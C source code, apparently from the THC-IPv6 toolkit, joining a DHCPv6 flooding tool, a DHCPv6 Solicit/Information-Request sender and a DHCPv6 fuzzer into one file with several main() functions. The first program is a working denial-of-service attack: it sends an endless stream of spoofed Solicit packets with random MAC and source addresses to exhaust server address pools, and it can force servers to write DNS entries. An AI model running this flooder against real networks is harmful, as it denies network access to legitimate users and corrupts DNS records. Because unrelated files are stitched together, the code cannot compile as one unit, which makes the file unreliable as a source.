void check_packets(u_char * foo, const struct pcap_pkthdr *header, const unsigned char *data) {
int len = header->caplen, pkt_len = 0, mlen = 10, olen;
unsigned char *ptr = (unsigned char *) data, *pkt = NULL;
char *smac, mac[6] = { 0, 0x0d, 0, 0x0d, 0x0d, 0x0e };
char mybuf[1024] = { 0x03, 0, 0, 0, 0, 8, 0, 2, 0, 0 };
if (len < 140 || data[20] != NXT_UDP || data[62] != 2)
return;
data += 62;
len -= 62;
memcpy(mybuf + 1, data + 1, 3);
data += 4;
len -= 4;
while (len >= 4) {
if ((olen = data[2] * 256 + data[3]) > len - 4 || olen < 0) {
printf("Information: evil packet received\n");
olen = 0;
len = -1;
} else {
if (data[1] > 1 && data[1] <= 3) {
memcpy(mybuf + mlen, data, olen + 4);
mlen += olen + 4;
} else if (data[1] == 1) {
memcpy(mybuf + mlen, data, olen + 4);
mlen += olen + 4;
//smac auf client mac in paket setzen
if (olen == 14)
smac = (char *) (data + 12);
else
smac = mac;
} else if (data[1] == 39 && do_dns) {
memcpy(mybuf + mlen, data, olen + 4);
mybuf[mlen + 4] = 1; // force server to write dns entry
mlen += olen + 4;
}
data += olen + 4;
len -= olen + 4;
if (len < 0) {
printf("Information: evil packet received\n");
len = -1;
}
}
}
if (len >= 0) {
counter++;
if ((pkt = thc_create_ipv6(interface, PREFER_LINK, &pkt_len, ptr + 38, ptr + 22, 1, 0, 0, 0, 0)) == NULL)
return;
if (thc_add_udp(pkt, &pkt_len, 546, 547, 0, mybuf, mlen) < 0)
return;
if (thc_generate_and_send_pkt(interface, smac, ptr + 6, pkt, &pkt_len) < 0)
return;
pkt = thc_destroy_packet(pkt);
if (counter % 100 == 0)
printf("!");
}
}
int main(int argc, char *argv[]) {
char mac[6] = { 0, 0x0c, 0, 0, 0, 0 }, *pkt = NULL;
char wdatabuf[1024];
unsigned char *mac6 = mac, *src, *dst;
int i, s, len, pkt_len = 0, dlen = 0;
unsigned long long int count = 0;
pcap_t *p = NULL;
int do_all = 1, use_real_mac = 0, use_real_link = 0;
if (argc < 2 || strncmp(argv[1], "-h", 2) == 0)
help(argv[0]);
if (getenv("THC_IPV6_PPPOE") != NULL || getenv("THC_IPV6_6IN4") != NULL) printf("WARNING: %s is not working with injection!\n", argv[0]);
while ((i = getopt(argc, argv, "d:nNr1")) >= 0) {
switch (i) {
case 'N':
use_real_link = 1; // no break
case 'n':
use_real_mac = 1;
break;
case '1':
do_all = 0;
break;
case 'd':
do_dns = 1;
dns_name = optarg;
break;
case 'r':
i = 0;
break; // just to ignore -r
default:
fprintf(stderr, "Error: unknown option -%c\n", i);
exit(-1);
}
}
memset(mac, 0, sizeof(mac));
interface = argv[optind];
if (use_real_link)
src = thc_get_own_ipv6(interface, NULL, PREFER_LINK);
else
src = thc_resolve6("fe80::");
if (use_real_mac)
mac6 = thc_get_own_mac(interface);
if (argc - optind <= 1)
dst = thc_resolve6("ff02::1:2");
else
dst = thc_resolve6(argv[optind + 1]);
setvbuf(stdout, NULL, _IONBF, 0);
setvbuf(stderr, NULL, _IONBF, 0);
if (src == NULL || mac6 == NULL) {
fprintf(stderr, "Error: invalid interface %s or bad mac/IP defined\n", interface);
exit(-1);
}
// only to prevent our system to send icmp port unreachable messages
if ((s = thc_bind_udp_port(546)) < 0)
fprintf(stderr, "Warning: could not bind to 546/udp\n");
if ((p = thc_pcap_init_promisc(interface, "ip6 and udp and dst port 546")) == NULL) {
fprintf(stderr, "Error: can not open interface %s in promisc mode\n", interface);
exit(-1);
}
len = sizeof(solicit);
memcpy(wdatabuf, solicit, len);
if (do_dns) {
memcpy(wdatabuf + len, dnsupdate1, sizeof(dnsupdate1));
dlen = len + 8;
len += sizeof(dnsupdate1);
if (dns_name != NULL && strlen(dns_name) < 240) {
if (dns_name[0] != '.') {
wdatabuf[len] = '.';
wdatabuf[dlen - 5]++;
wdatabuf[dlen - 3]++;
len++;
}
memcpy(wdatabuf + len, dns_name, strlen(dns_name) + 1);
wdatabuf[dlen - 5] += strlen(dns_name) + 1;
wdatabuf[dlen - 3] += strlen(dns_name) + 1;
len += strlen(dns_name) + 1;
}
memcpy(wdatabuf + len, dnsupdate2, sizeof(dnsupdate2));
len += sizeof(dnsupdate2);
}
printf("Starting to flood dhcp6 servers locally on %s (Press Control-C to end) ...\n\n", interface);
while (1) {
count++;
if (!use_real_link)
memcpy(src + 8, (char *) &count, 8);
// start0: 1-3 rand, 18-21 rand, 22-27 mac, 32-35 rand
for (i = 0; i < 3; i++) {
wdatabuf[i + 32] = rand() % 256;
wdatabuf[i + 18] = rand() % 256;
mac[i + 2] = rand() % 256;
if (do_dns)
wdatabuf[i + dlen] = 'a' + rand() % 26;
}
if (!use_real_mac)
memcpy(wdatabuf + 22, mac, 6);
memcpy(wdatabuf + 1, (char *) &count + _TAKE3, 3);
if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, src, dst, 1, 0, 0, 0, 0)) == NULL)
return -1;
if (thc_add_udp(pkt, &pkt_len, 546, 547, 0, wdatabuf, len) < 0)
return -1;
// we have to tone it down, otherwise we will not get advertisements
if (thc_generate_and_send_pkt(interface, mac6, NULL, pkt, &pkt_len) < 0)
printf("!");
pkt = thc_destroy_packet(pkt);
if (do_all) {
usleep(75);
while (thc_pcap_check(p, (char *) check_packets, NULL) > 0);
}
if (count % 1000 == 0)
printf(".");
}
return 0; // never reached
}
int main(int argc, char *argv[]) {
char mac[6] = { 0, 0x0c, 0, 0, 0, 0 }, *pkt = NULL, *pkt2 = NULL;
char wdatabuf[1024], wdatabuf2[1024];
unsigned char *mac6 = mac, *src, *dst;
int i, s, len, len2, pkt_len = 0, pkt2_len = 0;
unsigned long long int count = 0;
pcap_t *p = NULL;
int do_all = 1, use_real_mac = 1, use_real_link = 1;
if (argc < 2 || strncmp(argv[1], "-h", 2) == 0)
help(argv[0]);
if (getenv("THC_IPV6_PPPOE") != NULL || getenv("THC_IPV6_6IN4") != NULL) printf("WARNING: %s is not working with injection!\n", argv[0]);
while ((i = getopt(argc, argv, "dnNr1")) >= 0) {
switch (i) {
case 'N':
use_real_link = 1; // no break
case 'n':
use_real_mac = 1;
break;
case '1':
do_all = 0;
break;
case 'r':
i = 0;
break; // just to ignore -r
default:
fprintf(stderr, "Error: unknown option -%c\n", i);
exit(-1);
}
}
memset(mac, 0, sizeof(mac));
interface = argv[optind];
if (thc_get_own_ipv6(interface, NULL, PREFER_LINK) == NULL) {
fprintf(stderr, "Error: invalid interface %s\n", interface);
exit(-1);
}
dns_name = argv[optind + 1];
if (use_real_link)
src = thc_get_own_ipv6(interface, NULL, PREFER_LINK);
else
src = thc_resolve6("fe80::");
if (use_real_mac)
mac6 = thc_get_own_mac(interface);
dst = thc_resolve6("ff02::1:2");
setvbuf(stdout, NULL, _IONBF, 0);
setvbuf(stderr, NULL, _IONBF, 0);
// only to prevent our system to send icmp port unreachable messages
if ((s = thc_bind_udp_port(546)) < 0)
fprintf(stderr, "Warning: could not bind to 546/udp\n");
if ((p = thc_pcap_init_promisc(interface, "ip6 and udp and dst port 546")) == NULL) {
fprintf(stderr, "Error: can not open interface %s in promisc mode\n", interface);
exit(-1);
}
len = sizeof(solicit);
memcpy(wdatabuf, solicit, len);
len2 = sizeof(inforeq);
memcpy(wdatabuf2, inforeq, len2);
printf("Sending DHCPv6 Solicitate message ...\n");
printf("Sending DHCPv6 Information Request message ...\n");
if (!use_real_link)
memcpy(src + 8, (char *) &count, 8);
// start0: 1-3 rand, 18-21 rand, 22-27 mac, 32-35 rand
for (i = 0; i < 3; i++) {
wdatabuf[i + 32] = rand() % 256;
wdatabuf[i + 18] = rand() % 256;
mac[i + 2] = rand() % 256;
}
if (!use_real_mac)
memcpy(wdatabuf + 22, mac, 6);
if (!use_real_mac)
memcpy(wdatabuf2 + 18, mac, 6);
memcpy(wdatabuf + 1, (char *) &count + _TAKE3, 3);
memcpy(wdatabuf2 + 1, (char *) &count + _TAKE3, 3);
if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, src, dst, 1, 0, 0, 0, 0)) == NULL)
return -1;
if (thc_add_udp(pkt, &pkt_len, 546, 547, 0, wdatabuf, len) < 0)
return -1;
if (thc_generate_and_send_pkt(interface, mac6, NULL, pkt, &pkt_len) < 0)
printf("!");
if ((pkt2 = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt2_len, src, dst, 1, 0, 0, 0, 0)) == NULL)
return -1;
if (thc_add_udp(pkt2, &pkt2_len, 546, 547, 0, wdatabuf2, len2) < 0)
return -1;
if (thc_generate_and_send_pkt(interface, mac6, NULL, pkt2, &pkt2_len) < 0)
printf("!");
signal(SIGALRM, clean_exit);
alarm(3);
// i = thc_send_pkt(interface, pkt, &pkt_len);
pkt = thc_destroy_packet(pkt);
while (1) {
usleep(75);
while (thc_pcap_check(p, (char *) check_packets, NULL) > 0);
}
return 0; // never reached
}
int main(int argc, char *argv[]) {
char mac[6] = { 0, 0x0c, 0, 0, 0, 0 }, *pkt = NULL;
// defines mac as 6 pieces and defines pkt as null.
char wdatabuf[1024];
//builds data buffer and sets memory size at 1024mb
unsigned char *mac6 = mac, *src, *dst;
//creates mac6 address usuing
int i, s, len, pkt_len = 0, dlen = 0;
int do_all = 1, use_real_mac = 1, use_real_link = 1;
int state;
if (argc < 2 || strncmp(argv[1], "-h", 2) == 0)
help(argv[0]);
if (getenv("THC_IPV6_PPPOE") != NULL || getenv("THC_IPV6_6IN4") != NULL) printf("WARNING: %s is not working with injection!\n", argv[0]);
//Parse options
while ((i = getopt(argc, argv, "123456789mn:t:e:T:dFp:fr")) >= 0) {
switch (i) {
case '1':
do_type = DO_SOL;
break;
case '2':
do_type = DO_REQ;
break;
case '3':
do_type = DO_CON;
break;
case '4':
do_type = DO_REN;
break;
case '5':
do_type = DO_REB;
break;
case '6':
do_type = DO_REL;
break;
case '7':
do_type = DO_DEC;
break;
case '8':
do_type = DO_INF;
break;
case 'm':
fuzz_msg_type = 1;
break;
case 'n':
no_send = atoi(optarg);
break;
case 't':
test_start = atoi(optarg);
break;
case 'e':
test_end = atoi(optarg);
break;
case 'T':
test_end = test_start = atoi(optarg);
break;
case 'F':
use_real_link = 0; // no break
case 'f':
use_real_mac = 0;
break;
case 'p':
ping = atoi(optarg);
break;
case 'd':
do_dns = 1;
break;
case 'r':
i = 0;
break; // just to ignore -r
default:
fprintf(stderr, "Error: unknown option -%c\n", i);
exit(-1);
}
}
//Check options
if (no_send < 1) {
fprintf(stderr, "ERROR: -n number must be between one and 2 billion\n");
exit(-1);
}
if (test_end < test_start) {
printf("don't f**k up the command line options!\n");
exit(-1);
}
memset(mac, 0, sizeof(mac));
interface = argv[optind];
dns_name = argv[optind + 1];
if (use_real_link)
src = thc_get_own_ipv6(interface, NULL, PREFER_LINK);
else
src = thc_resolve6("fe80::");
if (use_real_mac) {
mac6 = thc_get_own_mac(interface);
memcpy(mac, mac6, sizeof(mac));
}
dst = thc_resolve6("ff02::1:2");
setvbuf(stdout, NULL, _IONBF, 0);
setvbuf(stderr, NULL, _IONBF, 0);
// only to prevent our system to send icmp port unreachable messages
if ((s = thc_bind_udp_port(546)) < 0)
fprintf(stderr, "Warning: could not bind to 546/udp\n");
if ((p = thc_pcap_init_promisc(interface, "ip6 and udp and dst port 546")) == NULL) {
fprintf(stderr, "Error: can not open interface %s in promisc mode\n", interface);
exit(-1);
}
//Establish state
if (do_type == DO_SOL || do_type == DO_REB)
state = STATELESS;
else
state = STATEFULL;
// generate full fuzz mask for stateless types and partial for statefull types
strcpy(fuzzbuf, fuzztype_ether);
strcat(fuzzbuf, fuzztype_ip6);
strcat(fuzzbuf, fuzztype_udp);
if (fuzz_msg_type)
strcat(fuzzbuf, fuzztype_dhcp6);
else
strcat(fuzzbuf, fuzztype_dhcp6no);
if (state == STATELESS) {
strcat(fuzzbuf, fuzztype_elapsed_time);
strcat(fuzzbuf, fuzztype_client_identifier);
strcat(fuzzbuf, fuzztype_IA_NA);
if (do_dns)
strcat(fuzzbuf, fuzztype_FQDN);
}
/** Generate packet **/
len = sizeof(solicit);
memcpy(wdatabuf, solicit, len);
//Add dns option
if (do_dns) {
memcpy(wdatabuf + len, dnsupdate1, sizeof(dnsupdate1));
memcpy(dns_option_hdr + dns_option_hdr_len, dnsupdate1, sizeof(dnsupdate1));
dlen = len + 8;
len += sizeof(dnsupdate1);
dns_option_hdr_len += sizeof(dnsupdate1);
//Append domain string prefix fuzz mask
if (state == STATELESS) { //<-- Do fuzzbuffer later
for (i = 0; i < 7; ++i) //7 == Length of hard coded domain prefix
strcat(fuzzbuf, "B");
}
if (dns_name != NULL && strlen(dns_name) < 240) {
if (dns_name[0] != '.') {
wdatabuf[len] = '.';
wdatabuf[dlen - 5]++;
wdatabuf[dlen - 3]++;
len++;
}
memcpy(wdatabuf + len, dns_name, strlen(dns_name) + 1);
memcpy(dns_option_hdr + dns_option_hdr_len, dns_name, strlen(dns_name) + 1);
wdatabuf[dlen - 5] += strlen(dns_name) + 1;
wdatabuf[dlen - 3] += strlen(dns_name) + 1;
len += strlen(dns_name) + 1;
dns_option_hdr_len += strlen(dns_name) + 1;
//Append variable length domain string suffix fuzz mask
if (state == STATELESS) {
for (i = 0; i < strlen(dns_name) + 1; ++i)
strcat(fuzzbuf, "B");
}
}
memcpy(wdatabuf + len, dnsupdate2, sizeof(dnsupdate2));
memcpy(dns_option_hdr + dns_option_hdr_len, dnsupdate2, sizeof(dnsupdate2));
len += sizeof(dnsupdate2);
dns_option_hdr_len += sizeof(dnsupdate2);
//Append option request (FQDN request) fuzz mask
if (state == STATELESS){
strcat(fuzzbuf, fuzztype_option_request);
}
}
//Set message type
if (state == STATELESS) {
switch (do_type) {
case DO_SOL:
wdatabuf[0] = 0x01;
break;
case DO_REB:
wdatabuf[0] = 0x06;
break;
default:
break;
}
}
//random src mac
if (!use_real_link)
for (i = 0; i < 8; i++)
src[i + 8] = rand() % 256;
// start0: 1-3 rand, 18-21 rand, 22-27 mac, 32-35 rand
for (i = 0; i < 3; i++) {
wdatabuf[i + 1] = rand() % 256;
wdatabuf[i + 18] = rand() % 256;
wdatabuf[i + 32] = rand() % 256;
if (!use_real_mac) {
mac[i * 2] = rand() % 256;
mac[i * 2 + 1] = rand() % 256;
}
if (do_dns)
wdatabuf[i + dlen] = 'a' + rand() % 26;
}
memcpy(wdatabuf + 22, mac, 6);
if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, src, dst, 1, 0, 0, 0, 0)) == NULL)
return -1;
if (thc_add_udp(pkt, &pkt_len, 546, 547, 0, wdatabuf, len) < 0)
return -1;
if (thc_generate_pkt(interface, mac6, NULL, pkt, &pkt_len) < 0)
return -1;
//Fuzz solicit packet
if (state == STATELESS) {
if (fuzz_loop(pkt, &pkt_len) < 0)
return -1;
}
//Fuzz request, confirm or renew paket
else if (state == STATEFULL) {
//Send a dhcp solicit to discover dhcpv6 servers
if (thc_send_pkt(interface, pkt, &pkt_len) < 0) {
fprintf(stderr, "Error: Failed to send initial solicit packet\n");
return -1;
}
usleep(75); //<-- I don't really know why this is neccessary but it seems to be
//Construct and fuzz packets using server identifier
got_packet = 0;
time_t start_time = time(NULL);
while(time(NULL) - start_time < timeout) {
while (thc_pcap_check(p, (char *) construct_from_adv_and_fuzz, NULL) > 0); //got_packet set in callback function
if (got_packet)
break;
}
if (!got_packet)
fprintf(stderr, "Timeout: Didn't receive solicited advertisement packet within timeout. Is server down?\n");
}
pkt = thc_destroy_packet(pkt);
// printf("fuzzbuf: %s\n", fuzzbuf);
return 0;
}
void construct_from_adv_and_fuzz(u_char *foo, const struct pcap_pkthdr *header, const unsigned char *data) {
int len = header->caplen, pkt_len = 0, mlen = 10, olen;
unsigned char *ptr = (unsigned char *) data, *pkt = NULL;
char *smac, mac[6] = { 0, 0x0d, 0, 0x0d, 0x0d, 0x0e };
char mybuf[1024] = { 0x03, 0, 0, 0, 0, 8, 0, 2, 0, 0 };
int done_dns = 0, i;
//Begin fuzz buffer
strcat(fuzzbuf, fuzztype_elapsed_time);
//Set message type
switch (do_type) {
case DO_REQ:
mybuf[0] = 0x03;
break;
case DO_CON:
mybuf[0] = 0x04;
break;
case DO_REN:
mybuf[0] = 0x05;
break;
case DO_REL:
mybuf[0] = 0x08;
break;
case DO_DEC:
mybuf[0] = 0x09;
break;
case DO_INF:
mybuf[0] = 0x0B;
break;
default:
fprintf(stderr, "Error: Unknown do type %d\n", do_type);
exit(-1);
break;
}
//Skip over header to dhcp header
if (do_hdr_size) {
data += do_hdr_size;
len -= do_hdr_size;
if ((data[0] & 240) != 0x60)
return;
} else {
data += 14;
len -= 14;
}
if (len < 126 || data[6] != NXT_UDP || data[48] != 2)
return;
data += 48;
len -= 48;
//Copy transaction id and skip to message options
memcpy(mybuf + 1, data + 1, 3);
data += 4;
len -= 4;
//Loop over options till reach end of header
while (len >= 4) {
//Set olen to the option length minus type and length fields and check for bogus packet
if ((olen = data[2] * 256 + data[3]) > len - 4 || olen < 0) { //the 4 here is the 4 bytes for the option type and option length fields
printf("Information: evil packet received\n");
olen = 0;
len = -1;
}
else {
//Copy server identifier or IA_NA to message
if (data[1] > 1 && data[1] <= 3 && !(data[1] == 2 && do_type == DO_CON) && !(data[1] == 3 && do_type == DO_INF)) { //skip copying server identifier for confirm or IA_NA for information request messages
memcpy(mybuf + mlen, data, olen + 4);
mlen += olen + 4;
//Append server identifier fuzzing
if (data[1] == 2)
strcat(fuzzbuf, fuzztype_server_identifier);
//Append IA_NA fuzzing + IA Address fuzzing
else if (data[1] == 3) {
strcat(fuzzbuf, fuzztype_IA_NA);
if (olen > 12)
strcat(fuzzbuf, fuzztype_IA_Address);
}
// printf("buf(%d): %s\n", strlen(fuzzbuf), fuzzbuf);
}
//Copy client identifier to message
else if (data[1] == 1) {
memcpy(mybuf + mlen, data, olen + 4);
mlen += olen + 4;
//smac auf client mac in paket setzen
if (olen == 14)
smac = (char *) (data + 12);
else
smac = mac;
//Append client identifier fuzzing
strcat(fuzzbuf, fuzztype_client_identifier);
// printf("buf(%d): %s\n", strlen(fuzzbuf), fuzzbuf);
}
//Copy dns option
else if (data[1] == 39 && do_dns) {
memcpy(mybuf + mlen, data, olen + 4);
mybuf[mlen + 4] = 1; // force server to write dns entry
mlen += olen + 4;
//Append dns fuzzing
strcat(fuzzbuf, fuzztype_FQDN);
for (i = 0; i < olen - 1; ++i)
strcat(fuzzbuf, "B"); //Fuzz the domain name string
strcat(fuzzbuf, fuzztype_option_request);
// printf("buf(%d): %s\n", strlen(fuzzbuf), fuzzbuf);
//Make sure we don't add dns twice
done_dns = 1;
}
data += olen + 4;
len -= olen + 4;
if (len < 0) {
printf("Information: evil packet received\n");
len = -1;
}
}
}
//Add saved dns option onto this packet
if (do_dns && !done_dns) {
memcpy(mybuf + mlen, dns_option_hdr, dns_option_hdr_len);
mlen += dns_option_hdr_len;
//Append dns fuzzing
olen = dns_option_hdr[2] * 256 + dns_option_hdr[3];
strcat(fuzzbuf, fuzztype_FQDN);
for (i = 0; i < olen - 1; ++i)
strcat(fuzzbuf, "B"); //Fuzz the domain name string
strcat(fuzzbuf, fuzztype_option_request);
// printf("buf(%d): %s\n", strlen(fuzzbuf), fuzzbuf);
}
//Build and send fuzzed message packets
if (len >= 0) {
unsigned char* dst = thc_resolve6("ff02::1:2");
if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, ptr + 38, dst, 1, 0, 0, 0, 0)) == NULL) {
fprintf(stderr, "Error: Couldn't create dhcp requests ipv6 header\n");
exit(-1);
}
if (thc_add_udp(pkt, &pkt_len, 546, 547, 0, mybuf, mlen) < 0) {
fprintf(stderr, "Error: Couldn't create dhcp requests udp header\n");
exit(-1);
}
if (thc_generate_pkt(interface, smac, ptr + 6, pkt, &pkt_len) < 0) {
fprintf(stderr, "Error: Couldn't create dhcp requests ethernet header\n");
exit(-1);
}
if (fuzz_loop(pkt, &pkt_len) < 0) {
fprintf(stderr, "Error: Fuzzing request packet failed\n");
exit(-1);
}
else {
got_packet = 1; //Used to suppress timeout error
}
pkt = thc_destroy_packet(pkt);
}
//Truncate the fuzz buffer back to it's original length
fuzzbuf[66] = 0;
// printf("Trunc fuzzbuf: %s\n", fuzzbuf);
}
int check_alive(pcap_t * p) {
int ret = -2, len, pkt_len = 0, i;
time_t t;
char wdatabuf[1024];
char *pkt = NULL;
unsigned char *dst = thc_resolve6("ff02::1:2");
unsigned char *mac6 = thc_get_own_mac(interface);
len = sizeof(solicit);
memcpy(wdatabuf, solicit, len);
// start0: 1-3 rand, 18-21 rand, 22-27 mac, 32-35 rand
for (i = 0; i < 3; i++) {
wdatabuf[i + 1] = rand() % 256;
wdatabuf[i + 18] = rand() % 256;
wdatabuf[i + 32] = rand() % 256;
}
memcpy(wdatabuf + 22, mac6, 6);
if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, NULL, dst, 1, 0, 0, 0, 0)) == NULL) {
fprintf(stderr, "Error: Failed to create check allive ivp6 packet header\n");
exit(-1);
}
if (thc_add_udp(pkt, &pkt_len, 546, 547, 0, wdatabuf, len) < 0) {
fprintf(stderr, "Error: Failed to create check allive udp packet header\n");
exit(-1);
}
if (thc_generate_pkt(interface, mac6, NULL, pkt, &pkt_len) < 0) {
fprintf(stderr, "Error: Failed to create check allive packet header\n");
exit(-1);
}
// debug = 1;
//Empty packet capture queue
while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0);
//Send initial solicit request
try_send_pkt(interface, pkt, &pkt_len);
//Check for response in loop and timeout if we don't get one
t = time(NULL);
while (ret < 0) {
//Got reply packet; server alive!
if (thc_pcap_check(p, (char *) ignoreit, NULL) > 0)
ret = 1;
//If we still haven't received a packet after 1 second resend the solicit
if (time(NULL) > t + 1 && ret == -2) {
if (thc_send_pkt(interface, pkt, &pkt_len) < 0) { //Don't want to use try_send_pkt as it could take longer than timeout
usleep(75);
thc_send_pkt(interface, pkt, &pkt_len); //Retry sending packet after short time if sending failed
}
ret = -1;
}
//Fail after 4 seconds
if (time(NULL) > t + timeout && ret < 0)
ret = 0;
}
if (ret == 0) {
fprintf(stderr, "Timeout: Failed to receive dhcp solicitation replay in check alive function within %d seconds\n", timeout);
}
// debug = 0;
thc_destroy_packet(pkt);
return ret > 0 ? 1 : 0;
}
